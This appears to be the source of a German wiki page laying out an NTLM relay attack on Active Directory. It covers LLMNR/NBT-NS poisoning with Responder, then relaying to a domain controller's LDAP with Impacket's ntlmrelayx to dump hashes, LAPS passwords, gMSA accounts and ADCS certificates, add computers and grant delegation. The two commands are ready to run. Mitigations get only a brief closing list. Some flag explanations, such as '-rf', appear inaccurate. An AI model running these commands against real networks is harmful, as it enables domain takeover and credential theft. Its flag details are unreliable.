Quelltext der Seite NTLM-Relay-Angriff mit Impacket: Domänenkompromittierung via LDAP

= NTLM-Relay-Angriff mit Impacket: Domänenkompromittierung via LDAP =

== Ziel ==
Ein Angreifer leitet die NTLM-Authentifizierung eines Windows-Clients auf einen Domain Controller (DC) um, um:
* Benutzer-Hashes zu stehlen (für Passwort-Cracking oder Pass-the-Hash)
* Schädliche Gruppenrichtlinien (GPOs) zu erstellen
* Neue Benutzer mit Admin-Rechten anzulegen

== Voraussetzungen ==
* Netzwerkzugriff zum Ziel-Subnetz
* LLMNR/NBT-NS-Poisoning aktiv auf Zielgeräten
* SMB-Signing nicht erzwungen auf dem DC
* Domain Controller mit LDAP/SMB-Exposition

== Angriffsablauf ==

=== Schritt 1: Responder für Poisoning konfigurieren ===
<pre>
responder -I eth0 -wrf
</pre>
* <code>-I</code>: Netzwerkinterface
* <code>-w</code>: WPAD-Rogue-Server
* <code>-rf</code>: Aktiviere FTP/SMB-Rogue-Server

=== Schritt 2: NTLM-Relay auf LDAP starten ===
<pre>
impacket-ntlmrelayx -t ldap://dc01.domain.local -smb2support \
--remove-mic --add-computer --delegate-access \
--dump-laps --dump-gmsa --dump-adcs
</pre>

=== Schritt 3: Erfolgreichen Relay nutzen ===
Nach erfolgreichem Relay erscheinen gesammelte Daten:
* Benutzer-Hashes
* LAPS-Passwörter
* GMSA-Konten
* ADCS-Zertifikate

== Schutzmaßnahmen ==
* LLMNR/NBT-NS deaktivieren
* SMB-Signing erzwingen
* LDAP-Signing und Channel Binding aktivieren
* NTLM vollständig deaktivieren (Kerberos bevorzugen)